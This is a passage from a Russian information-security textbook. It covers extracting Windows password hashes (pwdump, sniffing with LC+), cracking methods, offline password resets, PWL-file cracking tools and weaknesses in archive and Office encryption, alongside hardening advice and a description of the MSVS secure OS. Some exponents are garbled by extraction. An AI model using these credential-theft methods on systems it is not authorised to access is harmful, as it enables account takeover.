147 записи осуществим с помощью NTFSDOS Professional или NTFS for Windows 98. Далее выполняются действия по получению хэшей методом pwdump2 или pwdump3/pwdump3e. Перехват аутентификационных пакетов в сети Даже если программа SYSKEY установлена и активизирована, не имеется необходимого доступа к удаленному или локальному компью- теру, существует возможность получения хэшей паролей учетных запи- сей пользователей. Этим способом является перехват аутентификацион- ных пакетов в сети (sniffing (англ.) - вынюхивание). Клиентская машина обменивается с сервером аутентификационными пакетами каждый раз, когда требуется подтверждение прав пользователя. Необходимо, чтобы компьютер находился в сетевом сегменте пользователя или ресурса, к которому он обращается. Программа для перехвата аутентификацион- ных пакетов (sniffer (англ.) - вынюхиватель), встроенная в LC+, работает на машинах с Ethernet-адаптером и в Windows NT/2000/XP/Vista/Seven, и в Windows 95/98/Me. Программу LC+ в режиме перехвата аутентифика- ционных пакетов нужно оставить запущенной на некоторое время для сбора достаточного количества хэшей паролей. Полученные данные необходимо сохранить в файл, после чего в программе LC+ выполнить импорт файла сеанса LC+. Для препятствования получения хэшей паролей этим способом фирмой Microsoft было разработано расширение существующего меха- низма аутентификации, называемое NTLMv2. Его использование стано- вится возможным после установки Service Pack, начиная с Service Pack 4 для Windows NT. Восстановление паролей Пароль может быть получен различными способами: атакой по сло- варю, последовательным перебором и гибридом атаки по словарю и по- следовательного перебора. При атаке по словарю последовательно вычисляются хэши для каждого из слов словаря или модификаций слов словаря и сравниваются с хэшами паролей каждого из пользователей. При совпадении хэшей па- роль найден. Преимущество метода - его высокая скорость. Недостатком есть то, что таким образом могут быть найдены только очень простые пароли, которые имеются в словаре или являются модификациями слов словаря. Последовательный перебор комбинаций (brute force (англ.) - грубая сила (дословно), решение "в лоб") использует набор символов и вычис-
148 ляет хэш для каждого возможного пароля, составленного из этих симво- лов. При использовании этого метода пароль всегда будет определен, если составляющие его символы присутствуют в выбранном наборе. Единственный недостаток этого метода - большое количество времени, которое может потребоваться на определение пароля. Чем большее ко- личество символов содержится в выбранном наборе, тем больше време- ни может пройти, пока перебор комбинаций не закончится. При восстановлении паролей гибридом атаки по словарю и после- довательного перебора к каждому слову или модификации слова слова- ря добавляются символы справа и/или слева. Для каждой получившейся комбинации вычисляется хэш, который сравнивается с хэшами паролей каждого из пользователей. После получения хэшей паролей можно начать восстановление па- ролей. Двумя основными типами файла, содержащими хэши паролей, являются PwDump- (passwords dump (англ.) - дамп паролей) и Sniff- файл. Каждая строка PwDump-файла имеет следующий формат: "ИмяПользователя: RID: LM-хэш: NT-хэш: ПолноеИмя,Описание: ОсновнойКаталогПользователя:" Каждая из 7-символьных половин пароля зашифрована независимо от другой в LM-хэш по алгоритму DES (бывший федеральный стандарт США), NT-хэш получается в результате шифрования всего пароля по алгоритму MD4 (фирмы RSA Security, Inc.). LM-хэш содержит инфор- мацию о пароле без учета регистра (в верхнем регистре), а NT-хэш - с учетом регистра. После имени пользователя имеется уникальный иден- тификатор учетной записи RID (relative identifier (англ.) - относительный идентификатор), который для получения хэшей не используется. Иден- тификатор встроенной учетной записи администратора равен 500, госте- вой учетной записи - 501. LM-хэш присутствует для совместимости с другими операционными системами (LAN Manager, Windows for Workgroups, Windows 95/98/Me и т.д.). Его наличие упрощает восста- новление паролей. Если длина NT-пароля превышает 14 символов, LM- хэш соответствует пустому паролю. При существовании LM-хэша вос- становление сначала осуществляется по LM-хэшу, после нахождения LM-пароля используется NT-хэш для определения NT-пароля. Каждая строка Sniff-файла имеет следующий формат: "ИмяПользователя:3:ЗапросСервера:LM-ответ: NT-ответ"
149 LM-ответ получается в результате шифрования LM-хэша, NT-ответ - в результате шифрования NT-хэша. Шифрование выполняется по алго- ритму DES таким образом, что определить LM- и NT-пароль можно только при проверке всего пароля. Кроме того, в каждом случае исполь- зуется свой запрос сервера. Поэтому на определение паролей по Sniff- файлу потребуется значительно больше времени. При использовании нелатинских букв в пароле для восстановления паролей рекомендуется использовать LC+. Изменение паролей пользователей без их восстановления Если восстановление паролей пользователей Windows NT/2000/XP/Vista/Seven не требуется, возможно их изменение при име- ющемся доступе к локальному компьютеру. Изменение паролей делает- ся с помощью программы Offline NT Password & Registry Editor . Вы- полняется загрузка с дискеты с операционной системой Linux, выбор пользователя для изменения пароля, вычисление хэша пароля и модифи- кация файла SAM на диске с операционной системой. Программа под- держивает Windows NT/2000/XP/Vista/Seven, в т.ч. с активизированной служебной программой SYSKEY. Дополнительные возможности получения информации о паролях Если в сети есть машины с установленными на них операционными системами Windows 3.11, Windows for Workgroups или Windows 95/98/Me, то имеются дополнительные возможности получения инфор- мации о паролях. Как было отмечено ранее, по умолчанию в этих операционных си- стемах выполняется кэширование паролей пользователей на диск в фай- лы %WinDir%\.pwl. Пароли хранятся в зашифрованном виде, причем ре- гистр букв игнорируется (всегда используется верхний регистр). Алго- ритм шифрования паролей начиная с Windows 95 OSR2 был изменен, так как была исправлена обнаруженная ошибка, поэтому восстановить пароли из старых PWL-файлов значительно проще. Для этого могут быть применены программы Glide, PWL_Key, PwlHack, PwlTool. Для восстановления паролей из новых PWL-файлов можно использовать PwlHack или PwlTool. При разрешенном кэшировании паролей с момента входа и реги- страции пользователя в Windows и до момента выхода пароли можно определить, запустив программу PwlView. Показываются кэшируемые пароли на локальной машине для текущего пользователя, используя недокументированные функции Windows API.
150 Если пользователь Windows NT/2000/XP/Vista/Seven является одно- временно пользователем Windows 3.11, Windows for Workgroups или Windows 95/98/Me и будет определен его пароль (как пользователя Windows 3.11, Windows for Workgroups или Windows 95/98/Me), в кото- ром, как уже упоминалось ранее, содержатся только символы верхнего регистра, то с помощью LC+4 пароль Windows NT/2000/XP/Vista/Seven может быть легко определен. Необходимо в качестве известных симво- лов пароля указать символы ранее определенного пароля пользователя Windows 3.11, Windows for Workgroups или Windows 95/98/Me.
3.4.3. Защитные механизмы ОС МСВС
Обобщенная структура защищенных информационных технологий
на сегодняшний день включает четыре главных компонента: защищенную операционную систему (ЗОС) “Мобильная Система Вооруженных Сил” (МСВС 3.0); защищенную систему управления базами данных “Линтер-ВС” 6.0; программные средства общего применения (обеспечения повсе- дневной деятельности должностных лиц силовых ведомств, распреде- ленной гипертекстовой обработки данных и средств разработки прило- жений); средства защиты информации. В целом, под программным обеспечением защищенных информа- ционных технологий понимают совокупность программ, описаний и ин- струкций, предназначенных для управления вычислительным процессом персонального компьютера в среде МСВС, решение и отладку информа- ционных и расчетных задач. Основными функциями ПО защищенных информационных техно- логий являются: планирование и организация функционирования ПК; контроль функционирования ПК; автоматизация процесса разработки программ; обеспечение решения информационных и расчетных задач. ПО ПК защищенных информационных технологий условно разби- вается на две части: общее программное обеспечение защищенных информационных технологий;
151 прикладное программное обеспечение защищенных информаци- онных технологий. Общее программное обеспечение защищенных информационных технологий с самых общих позиций предназначено для эффективной ор- ганизации подготовки к решению и самого решения информационных и расчетных задач, а также для организации и контроля вычислительного процесса ПК при ее функционировании. Общее программное обеспече- ние позволяет пользователю создавать любые прикладные программные средства и управлять работой компьютера. Состав и структура мобильной ОС Защищенная ОС МСВС - это мобильная, многопользовательская, многозадачная операционная система, поддерживающая симметричные многопроцессорные архитектуры и работающая как в режиме команд- ной строки, так и в режиме графического интерфейса. Основное назначение ОС МСВС - управление ресурсами системы и процессами, использующими эти ресурсы при вычислениях. ОС МСВС – отечественная защищенная ОС. Используется для по- строения на ее основе защищенных информационных систем. Обладает развитыми средствами управления доступом пользователей к ресурсам ОС, включающими механизмы мандатного, дискреционного и ролевого управления доступом. Помимо развития средств защиты, совершенствования базовых функциональных возможностей и расширения поддержки современных устройств, для ОС МСВС были сделаны значительные доработки по ча- сти интерфейса пользователя и администратора системы, а также по ру- сификации системы. Кроме того, на базе ОС МСВС разработана защищенная операци- онная система «Оливия», предназначенная для интегрирования в ком- плексную систему обеспечения безопасности мобильного компонента автоматизированных систем управления силовых ведомств, для встраи- вания и взаимодействия со средствами криптографической защиты ин- формации. Таким образом, ОС МСВС - это универсальное инструментальное средство для управления техническими средствами и задачами. Это многопользовательская многозадачная ОС, которая может быть исполь- зована как в качестве базового ПО сервера, так и в качестве ОС графи- ческой рабочей станции. ОС МСВС 3.0 как программное изделие поставляется в виде загру- зочного модуля и комплекта эксплуатационной документации. Загру-
152 зочный модуль поставляется на CD-ROM, а комплект эксплуатационной документации на бумажном носителе. Данная операционная система относится к системам класса UNIX. Это означает, что ОС МСВС 3.0 не только поддерживает многопользо- вательскую многозадачную работу в режиме разделения времени, но и имеет виртуальную организацию памяти, обладает сетевой прозрачно- стью. При разработке ОС МСВС учитывался стандарт LSB (Linux Standard Base). ОС МСВС, как и совместимая с нею ЗОС «Оливия», может быть загружена как с внутренних устройств хранения, так и со сменных носителей. В состав ОС МСВС входят четыре комплекса: базовая конфигурация ОС; система графического интерфейса; система защиты от НСД; средства разработки. Рассмотрим их детальнее. Комплекс "Базовая конфигурация ОС". Данный комплекс предна- значен для выполнения основных функций ОС и по существу является самой ОС, в которой отсутствуют система графического интерфейса, си- стема защиты от несанкционированного доступа и средства разработки. В состав комплекса "Базовая конфигурация ОС" входят четыре компо- нента: ядро и окружение; системные утилиты; системные библиотеки; средства установки. Комплекс "Базовая конфигурация ОС" может иметь самостоятель- ное применение в тех случаях, когда пользователь не нуждается в спе- циальных средствах защиты информации, средствах разработки про- грамм и вся работа пользователя осуществляется в режиме командной строки. Для функционирования этого комплекса требуется значительно меньше вычислительных ресурсов, чем для функционирования ОС МСВС 3.0. Комплекс "Система графического интерфейса" предназначен для организации выполнения прикладных задач в режиме графического интерфейса.
153 Для МСВС 3.0, как и для всех ОС семейства UNIX, стандартом графического интерфейса является система X-Window System (далее по тексту X-Window).. Система графического интерфейса (СГИ) обеспечивает многоокон- ный графический режим работы в среде ОС МСВС в режиме разделения времени, который разрешает одновременное использование на одном экране нескольких прикладных программ, находящихся на одном или нескольких узлах локальной вычислительной сети. СГИ предоставляет пользователям набор интерфейсных программ, позволяющих создавать различные прикладные программы. СГИ является мощным средством для разработки и создания совре- менного графического интерфейса отдельных прикладных программ и при этом дает возможность отображать на одном экране графического дисплея результаты решения прикладных программ, выполняющихся на различных узлах ЛВС. В основе СГИ используется модель взаимодей- ствия клиент/сервер, которая состоит из трех взаимосвязанных частей: сервера, который управляет графическим дисплеем, клавиатурой и мышью; программ-клиентов, которые обращаются к серверу для выполне- ния определенных действий над окнами; канала связи, который использует программы-клиенты и сервер для общения между собой. Сервер системы графического интерфейса - это программа СГИ, которая запускается на ЭВМ и непосредственно управляет графическим дисплеем, клавиатурой и мышью. Именно сервер умеет воспринимать и обрабатывать сигналы, приходящие от клавиатуры, мыши и программ- клиентов. Сервер может исполняться на той же машине, что и клиент, или на другой машине. Клиент системы графического интерфейса - это прикладная про- грамма СГИ, использующая возможности оконной системы. Прикладная программа называется клиентом, так как она пользуется услугами серве- ра - она обращается к серверу с запросами на выполнение тех или иных действий. СГИ позволяет нескольким клиентам исполняться одновременно. Например, в одном окне редактируется текст, в другом окне в данное время компилируется программа, в третьем окне отображается текущее время, а в четвертом окне показывается средняя загрузка системы.
154 Хотя клиенты могут отображать результаты и получать ввод только от одного сервера, клиенты могут выполняться на различных компьюте- рах сети. Канал связи используется клиентом для передачи запросов серверу, а сервером - для передачи информации клиенту. Поддержка данной свя- зи встроена в базовую библиотеку СГИ, называемую библиотекой Xlib.. В результате все клиенты, использующие библиотеку Xlib, получают доступ к имеющимся методам связи. В СГИ клиент выполняется на той же ЭВМ, что и сервер, либо на удаленной ЭВМ, а графический дисплей (вместе с клавиатурой и мы- шью) с управляющим сервером - на основной ЭВМ. В случае с удален- ной ЭВМ они взаимодействуют по сети, используя протокол TCP/IP. При этом сервер и клиент полностью отделены друг от друга, а архитек- турная взаимосвязь компонент клиента и сервера СГИ через Х-протокол. Рассмотрим принцип работы пользователя в системе графического интерфейса. Пользовательская среда СГИ служит для удобного взаимо- действия пользователя с ОС МСВС и с прикладными программами, а также обеспечивает непротиворечивый, графически ориентированный пользовательский интерфейс. Пользовательская среда СГИ включает следующие компоненты: администратор окон; прикладные программы СГИ. Возможности администратора окон состоят в следующем. При запуске прикладных программ и создании окон, пользователь может изменить размер окон, переместить окна поместить их на дно стека, вытолкнуть окна из вершины стека. Можно также использовать администратор окон для свертки окон в пиктограммы. СГИ включает различные прикладные программы, разработанные для повышения производительности и удобства работы пользователя. К числу прикладных программ СГИ относятся следующие: bitmap, bmtoa, atobm - программы создания, редактирования и преобразования растрового образа; xcalc - калькулятор; xcalendar - календарь с записной книжкой; xclipboard - работа с текстовым буфером; xclock - отображение времени (часы); xcmdmenu - меню команд обслуживающих программ; xfm - файловый менеджер;
155 xfontsel - интерактивная программа для выбора шрифта; xkiil - снятие программы с выполнения; xload - отображение загрузки системы; xmag - увеличение части экрана; xmem - отображение занятости оперативной памяти; xmessage - отображение сообщения или запроса в окне; xset - установка характеристик дисплея; xsetroot - изменение свойств корневого окна. Комплекс "Система защиты от НСД" предназначен для обеспечения информационной безопасности. В состав комплекса "Система защиты от НСД" входят: средства защиты и утилиты настройки средств защиты от НСД. Компонент "Средства защиты от НСД" обеспечивает работу средств защиты и содержит: ядро ОС МСВС со встроенной системой защиты; утилиты для первоначальной инициализации системы защиты и задания первоначальных установок; программу для протоколирования сообщений системы защиты и программу контроля целостности файловой системы. Компонент "Утилиты настройки средств защиты от НСД" обеспе- чивает настройку средств защиты и содержит: утилиты для настройки параметров межсетевых экранов; утилиты для настройки системы защиты ОС МСВС 3.0; руководства пользователя для системы "man" по утилитам администрирования и системным вызовам ядра, относящимся к системе защиты; утилиту для настройки программы контроля целостности файло- вой системы. Комплекс "Средства разработки" предназначен для разработки при- кладных программ. В состав комплекса "Средства разработки" входят три компоненты: языки программирования; утилиты средств разработки; библиотеки средств разработки. Языками программирования комплекса являются: язык командного интерпретатора shell, язык С, язык C++,
156 язык Perl. Утилиты комплекса «Средства разработки» предназначены для обеспечения работы программиста в среде ОС МСВС 3.0 и включают в себя: интерпретатор командного языка shell, компилятор C/C++, редактор связей ld, построитель программ make, отладчик gdb, текстовые редакторы ed, sed, Vi и emacs, интерпретатор языка Perl, набор обслуживающих программ ar, nm, ranlib, size, strip. Библиотеки комплекса «Средства разработки» предназначены для вызова или включения различных подпрограмм, необходимых при раз- работке программы. Эти библиотеки являются неотъемлемой частью языков и комплекса «Средства разработки программного обеспечения». Командный язык (shell) является основным инструментом интерак- тивной работы пользователя за терминалом. После подключения поль- зователю (в соответствии с его привилегиями) доступен весь набор имеющихся команд. Диалог пользователя с ОС МСВС поддерживается интерпретатором команд shell. Включенные в состав комплекса «Средства разработки» средства программирования на языках C/C++ предлагают пользователям язык Ассемблера, языки С и C++, компилятор, библиотеки, редактор связей, отладчик.
3.5. Рекомендации по повышению эффективности па-
рольной защиты
3.5.1. Рекомендации администратору Windows
NT/2000/XP/Vista/Seven На ПЭВМ с Windows NT/2000/XP/Vista/Seven: 1) сделать недоступным для вскрытия системный блок компьютера для предотвращения возможного отключения жесткого диска с опера- ционной системой или подключения другого диска; 2) в Setup разрешить загрузку только с жесткого диска, чтобы не допу- стить загрузку с другого носителя;
157 3) установить пароль на вход в Setup, не позволяя отменить запрет на за- грузку с другого носителя; 4) Windows NT/2000/XP/Vista/Seven должна быть единственной опера- ционной системой, установленной на машине, что делает невоз- можным копирование и замену файлов из других операционных систем; 5) использовать только файловую систему NTFS, отказаться от исполь- зования FAT и FAT32; 6) удостовериться в Windows NT, что установлен Service Pack 3 или бо- лее поздний и активизирована служебная программа SYSKEY; 7) использовать встроенную в операционные системы Windows 2000/XP возможность шифрования файлов посредством EFS (Encrypting File System (англ.) - файловая система с шифрованием), являющейся ча- стью NTFS5; 8) запретить удаленное управление реестром, остановив соответствую- щую службу; 9) отменить использование особых общих папок ADMIN$, C$ и т.д., позволяющих пользователю с административными правами под- ключаться к ним через сеть. Для этого необходимо добавить в ре- естр параметр AutoShareWks (для версий Workstation и Prosessional) или AutoShareServer (для версии Server) типа DWORD и установить его в 0 в разделе: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanSer ver\Parameters Диапазон: 0-1, по умолчанию – 1 0 - не создавать особые общие ресурсы; 1 - создавать особые общие ресурсы; 10) запретить или максимально ограничить количество совместно ис- пользуемых сетевых ресурсов; 11) ограничить анонимный доступ в операционных системах Windows NT/2000, позволяющий при анонимном подключении получать ин- формацию о пользователях, политике безопасности и общих ресур- сах. В Windows NT/2000 нужно добавить в реестр параметр RestrictAnonymous типа DWORD в разделе: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA Диапазон: 0-2, по умолчанию - 0 для Windows NT/2000, 1 - для Windows XP. 0 - не ограничивать, положиться на заданные по умолчанию раз- решения;
158 1 - не разрешать получать список учетных записей и имен пользо- вателей; 2 - не предоставлять доступ без явных анонимных разрешений (недоступно в Windows NT); 12) если в сети отсутствуют клиенты с Windows for Workgroups и Windows 95/98/Me, то рекомендуется отключить LM- аутентификацию, так как это существенно затруднит восстановле- ние паролей при перехвате аутентификационных пакетов зло- умышленником. Если же такие клиенты присутствуют, то можно включить использование аутентификации только по запросу серве- ра. Это можно сделать, активизировав расширение механизма аутентификации NTLMv2. Для его активизации необходимо доба- вить в реестр следующие параметры: LMCompatibilityLevel типа DWORD в разделе HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA Диапазон: 0-5, по умолчанию - 0. 0 - посылать LM- и NT-ответы, никогда не использовать аутенти- фикацию NTLMv2; 1 - использовать аутентификацию NTLMv2, если это необходимо; 2 - посылать только NT-ответ; 3 - использовать только аутентификацию NTLMv2; 4 - контроллеру домена отказывать в LM-аутентификации; 5 - контроллеру домена отказывать в LM- и NT-аутентификации (допустима только аутентификация NTLMv2). NtlmMinClientSec или NtlmMinServerSec типа DWORD в разделе: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\MSV1_0 Диапазон: объединенные по логическому ИЛИ любые из следующих значений: 0x00000010 - целостность сообщений; 0x00000020 - конфиденциальность сообщений; 0x00080000 - безопасность сеанса NTLMv2; 0x20000000 - 128-битное шифрование; 13) запретить отображение имени пользователя, который последним регистрировался в операционной системе, в диалоговом окне реги- страции. Для этого нужно добавить в реестр строковый параметр DontDisplayLastUserName и установить его в 1 в разделе: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersio n\Winlogon Диапазон: 0-1, по умолчанию - 0.
159 0 - отображать имя последнего пользователя; 1 - не отображать имя последнего пользователя; 14) запретить запуск экранной заставки при отсутствии регистрации пользователя операционной системы в течение некоторого време- ни. Для этого нужно в реестре значение параметра ScreenSaveTimeOut установить в 0 в разделе: HKEY_USERS\.DEFAULT\Control Panel\Desktop; 15) не выбирать в качестве пароля или части пароля любое слово, кото- рое может являться словом словаря или его модификацией; 16) длина пароля в Windows NT должна быть не менее 7 символов (при максимально возможной длине пароля в 14 символов), в Windows 2000/XP - более 14 символов (при максимально возможной длине пароля в 128 символов); 17) пароль должен содержать символы из возможно большого сим- вольного набора. Нельзя ограничиваться только символами A-Z, желательнее использовать в пароле и буквы, и цифры, и специаль- ные символы (причем в каждой из 7-символьных половин пароля, если длина пароля менее или равна 14); 18) символы пароля, являющиеся буквами, должны быть как верхнего, так и нижнего регистра, что затруднит восстановление пароля, про- изводимое по NT-хэшу; 19) своевременно выполнять установку пакетов исправлений и обнов- лений операционной системы; 20) переименовать административную и гостевую учетные записи, от- ключив при этом последнюю; 21) избегать наличия учетной записи с именем и паролем, совпадаю- щими с административной, на другом компьютере в качестве обычной учетной записи; 22) иметь только одного пользователя с административными правами; 23) задать политику учетных записей (блокировку учетных записей по- сле определенного числа ошибок входа в систему, максимальный срок действия пароля, минимальную длину пароля, удовлетворение пароля требованиям сложности, требование неповторяемости паро- лей и т.д.); 24) установить аудит неудачных входов; 25) воспользоваться программами из пакета Microsoft Security Tool Kit, в частности HFNetChk и Microsoft Baseline Security Analyzer, про- веряющими наличие установленных обновлений и имеющихся ошибок в настройке системы безопасности;
160 26) периодически выполнять аудит паролей, используя программу LC+, или подобные ей.
3.6. Средства защиты файлов и документов
Практически всегда под защитой данных понимается наложение ограничений на доступ к информации. Эти ограничения, как правило, бывают трех типов: общее ограничение прав доступа; временное ограничение доступа; ограничение видов доступа. Пользователь может взаимодействовать с данными двумя основны- ми способами: локально и удаленно. При удаленном (сетевом) доступе пользователь сначала проходит процедуры идентификации и аутенти- фикации, а потом запрашивает у сервера необходимую ему информа- цию. Сервер выполняет все необходимые проверки и принимает реше- ние либо о предоставлении доступа, либо об отказе. Для защиты удален- ных данных разработаны формальные модели разграничения доступа, описание которых можно найти в любом хорошем учебнике по сетевой безопасности. Мы же будем рассматривать ситуации, когда все проверки реали- зуются локально. То есть пользователь (или противник) теоретически может полностью контролировать все шаги, которые та или иная про- грамма выполняет для получения доступа к данным. В условиях локальности проверок ограничивать, например, период доступа гораздо сложнее, чем при выполнении контроля на сервере. Но для простого обеспечения секретности, по идее, нет никаких препят- ствий — достаточно спросить у пользователя пароль или получить от него какую-то другую аутентифицирующую информацию, при помощи хорошей хэш-функции вычислить ключ шифрования и зашифровать на нем защищаемые данные при помощи стойкого криптографического ал- горитма. Однако в практических реализациях этой простейшей последо- вательности действий разработчики ухитряются допускать самые разно- образные ошибки, значительно снижающие уровень защищенности ин- формации, а иногда и вовсе сводят его к нулю. Защита данных может осуществляться в совершенно разных усло- виях, и, соответственно, в каждом случае необходимо использовать свои приемы защиты.
161 3.6.1. Механизмы паролирования архиваторов
Многие современные программы упаковки данных (архиваторы)
имеют встроенную поддержку шифрования. Если пользователь пожела- ет защитить от чужих глаз информацию, находящуюся в архиве, ему надо при упаковке ввести пароль, а архиватор сам выполнит все осталь- ные действия. При попытке извлечения зашифрованного файла архива- тор запросит у пользователя пароль и распакует файл только в том слу- чае, если пароль верен. Стоит отметить, что зашифрование всегда выполняется после ком- прессии, т. к. зашифрованные данные должны быть неотличимы от слу- чайной последовательности, и, следовательно, архиватор не сможет найти в них избыточность, за счет удаления которой и происходит упа- ковка. ZIP Алгоритм шифрования ZIP уязвим к атаке на основе открытого тек- ста и достаточно знать 12 незашифрованных байт (после компрессии), чтобы расшифровать весь файл за приемлемое время. Для архивов, содержащих 5 и более файлов и созданных архиватора- ми, основанными на библиотеке InfoZIP, возможна атака, использующая в качестве открытого текста данные из заголовков зашифрованных файлов. Этой атаке были подвержены файлы, созданные при помощи WinZIP, но в последних версиях этого архиватора проблема была исправлена. Еще в июле 2002 года компания PKWARE, Inc. выпустила версию архиватора PKZIP, поддерживающего более стойкие алгоритмы шифро- вания. Но, видимо, по той причине, что PKZIP позиционируется как продукт для корпоративных пользователей, новое шифрование не полу- чило широкого распространения. Advanced ZIP Password Recovery 2.43R Как видно из названия, программа Advanced ZIP Password Recovery (AZPR) служит для восстановления потерянных паролей к ZIP-архивам (см. рис.27). Она позволяет находить пароли к архивам, созданным ар- хиваторами PKZIP, WinZIP, InfoZIP и другими ZIP-совместимыми архи- ваторами. Программа поддерживает два типа атаки: прямой перебор (brute-force, то есть метод "грубой силы") и перебор по словарю. При brute-force атаке определяется набор символов (charset), из которых со- стоит пароль. Этот набор может включать в себя символы национальных алфавитов (в том числе и русского) как в OEM, так и в ANSI. Устанав-
162 ливается минимальная/максимальная длина пароля. Возможно сохране- ние всех опций программы в файле проекта. Чтобы подобрать пароль, содержащий символы криллицы, необходимо определить пользователь- ский набор, включив соответствующую опцию. Набор символов можно сохранить в файл для дальнейшей работы.
Рис. 27. Нахождение пароля архива ZIP
ARJ Популярный во времена DOS, но довольно редко используемый в настоящее время архиватор, разработанный Робертом Янгом (Robert Jung), использовал следующий алгоритм шифрования. Из пароля по очень простому обратимому алгоритму получалась гамма, равная по длине паролю. Эта гамма накладывалась на шифруе- мые данные путем сложения по модулю 2 (операция XOR). Таким обра- зом, наличие открытого текста, равного по длине паролю, позволяло моментально определить гамму и использованный пароль. Более того, в самом начале упакованных данных содержалась ин- формация компрессора, такая как таблицы Хаффмана (Huffman tables), и часть этой информации могла быть предсказана, что позволяло значи- тельно повысить скорость поиска пароля перебором. Начиная с версии 2.60 (ноябрь 1997 года) ARJ поддерживает шиф- рование по алгоритму ГОСТ 28147-89.
163 Advanced ARJ Password Recovery 1.07R Программа аналогична предыдущей, но отличается тем, что позво- ляет восстанавливать пароли к ARJ-архивам (см. рис. 28). Она дает воз- можность находить пароли к архивам, созданным ARJ, WinARJ и дру- гими ARJ-совместимыми архиваторами.
Рис. 28. Подбор пароля архива ARJ
В следующих версиях программ разработчики планируют увели- чить скорость перебора и добавить возможности параллельного перебо- ра паролей на нескольких машинах, объединенных в сеть. Кроме того, ожидается появление более развернутых статистических отчетов и оценки производительности машины при подборе пароля. Перспективным направлением является и known plain text attack — восстановление пароля в том случае, если известно содержимое архива (должен быть достоверно известен хотя бы один файл из архива). Кста- ти, благодаря тому, что разработчиком является российская фирма, "ши- роким пользовательским массам" предоставляется возможность выска- зать свои пожелания непосредственно автору программы. RAR Архиватор, разработанный Евгением Рошалем, является неплохим примером того, как можно подходить к шифрованию данных. В алгоритме шифрования, используемом в RAR версии 1.5, есть не- которые недочеты. Так эффективная длина ключа шифрования состав- ляет всего 64 бита, т. е. перебором 264 вариантов ключа можно гаранти- рованно расшифровать пароль. Более того, наличие открытого текста
164 позволяет уменьшить множество перебираемых вариантов до 240. Сле- довательно, атака может быть успешно выполнена даже на одном ком- пьютере. Скорость перебора на компьютере с процессором Intel Pentium III 333 МГц составляет примерно 600 000 паролей в секунду. При переходе к версии 2.0, видимо, была проведена серьезная рабо- та над ошибками. Во всяком случае, взлом нового алгоритма шифрова- ния перебором требует примерно 21023 операций, что намного больше, чем может быть выполнено на современной технике. Об эффективных атаках, использующих открытый текст, ничего не известно. Скорость перебора паролей снизилась примерно до 2000 штук в секунду (в 300 раз). Но разработчики RAR решили не останавливаться на достигнутом. В версии 3.0, появившейся в мае 2002 года, для шифрования стал ис- пользоваться алгоритм AES (Rijndael) с ключом длиной 128 бит. Такое решение выглядит вполне разумным как минимум по двум причинам. Во-первых, безопаснее использовать проверенный и хорошо зарекомен- довавший себя алгоритм, чем нечто самодельное, и у AES здесь нет кон- курентов. А во-вторых, у AES скорость шифрования выше, чем у алго- ритма, использованного в RAR 2.O. Кроме замены алгоритма шифрования, в RAR 3.0 используется и другая процедура получения ключа шифрования из пароля. Эта проце- дура требует вычисления хэш-функции SHA 1262144 раза, что позволяет перебирать около 3-х паролей в секунду, т. е. в 600 раз меньше, чем для RAR 2.0.
3.6.2. Механизмы паролирования документов Microsoft Office
и VBA.
3.6.3. Microsoft Word и Excel
Шифрование файлов было реализовано уже в Microsoft Word 2.0.
Из пароля с помощью легко обратимого алгоритма получалась 16- байтовая гамма, которая накладывалась на содержимое документа. Но вычисление гаммы без пароля не составляло никакого труда, т. к. гамма накладывалась и на служебные области, которые имели фиксированное значение во всех документах. В Word 6.0/95 и Excel 5.0/95 алгоритм шифрования не претерпел значительных изменений, но изменился формат файлов — он стал осно- вываться на хранилище OLE Structured Storage. Для восстановления па-
165 роля документа все также требовалось найти 16-байтовую гамму, ис- пользованную для шифрования данных. Один из методов, позволяющих отыскать гамму, например, для до- кументов Word, основывается на простейшем статистическом анализе. Самый часто встречающийся символ в тексте на любом языке — пробел. Таким образом, достаточно определить код наиболее используемого символа в каждой из 16 позиций, соответствующих разным байтам гам- мы. Выполнив операцию XOR каждого найденного значения с кодом пробела (0x20), мы получим 16 байт гаммы. В программах Word 97/2000 и Excel 97/2000 данные шифруются при помощи алгоритма RC4 с ключом длиной 40 бит. Такое шифрование уже не позволяет моментально определить пароль. Но производитель- ность вычислительной техники за последние годы выросла настолько сильно, что единственно правильный ключ шифрования документа Word (из 240 возможных) может быть найден максимум за четверо суток на компьютере с двумя процессорами AMD Athlon 2600+. Начиная с Office XP, наконец появилась поддержка шифрования документов ключами длиной более 40 бит. Но, похоже, большинство пользователей до сих пор продолжает использовать 40-битовое шифро- вание, т. к. оно позволяет открывать защищенные документы в преды- дущих версиях офисных программ. Да и изменение настроек шифрова- ния требует дополнительных действий со стороны пользователя (откры- тия диалога настроек и выбора нужного криптопровайдера), а по умол- чанию применяются 40-битовые ключи.
3.6.4. Microsoft Access
Базы данных Microsoft Access могут иметь два типа паролей: паро- ли на открытие и пароли для разграничения доступа на уровне пользова- теля. Пароль на открытие, похоже, никогда не представлял серьезной защиты, т. к., начиная с Access версии 2.0, он хранился в заголовке базы данных. Правда, сам заголовок был зашифрован алгоритмом RC4, но это не сильно увеличивало стойкость, т. к. в рамках одной версии формата всегда использовался один и тот же 32-битовый ключ шифрования, жестко прошитый в динамически загружаемую библиотеку, отвечаю- щую за работу с файлом базы данных. А учитывая то, что RC4 — синхронный потоковый шифр, доста- точно было один раз найти гамму, порождаемую RC4 с известным клю- чом. После этого пароль можно было определить, выполнив сложение по модулю 2 гаммы и нужных байт заголовка.
